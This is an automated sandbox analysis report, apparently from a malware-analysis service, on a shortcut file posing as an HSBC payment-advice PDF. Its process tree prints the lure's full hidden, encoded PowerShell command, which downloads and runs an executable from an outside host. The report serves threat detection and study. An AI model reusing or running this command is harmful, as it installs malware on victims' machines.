Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    26-07-2024 11:02

General

  • Target

    Payment Advice__HSBC Banking.pdf.lnk

  • Size

    2KB

  • MD5

    a38b0a4d0768ba8ce7c73904b55ee9ff

  • SHA1

    a1a13ef45fcf88eaff3dcffba1fb2608aa07e3c8

  • SHA256

    3f2491926888db2c9d6c7b1a426ff41e1cd4a13bc922156a814b9fe3032ff809

  • SHA512

    4159cd37110d910624b8bb5c837e70668b3e6d795e1ab276ea32f5ab315509dedf11bd865d4c1be41f9cec698235453996939a0ac8a45f36a28a45bdf28b7cf8

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Payment Advice__HSBC Banking.pdf.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2860

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2860-40-0x000007FEF627E000-0x000007FEF627F000-memory.dmp

    Filesize

    4KB

  • memory/2860-41-0x000000001B550000-0x000000001B832000-memory.dmp

    Filesize

    2.9MB

  • memory/2860-42-0x0000000002890000-0x0000000002898000-memory.dmp

    Filesize

    32KB

  • memory/2860-43-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

    Filesize

    9.6MB

  • memory/2860-44-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

    Filesize

    9.6MB

  • memory/2860-45-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

    Filesize

    9.6MB

  • memory/2860-46-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

    Filesize

    9.6MB

  • memory/2860-47-0x000007FEF5FC0000-0x000007FEF695D000-memory.dmp

    Filesize

    9.6MB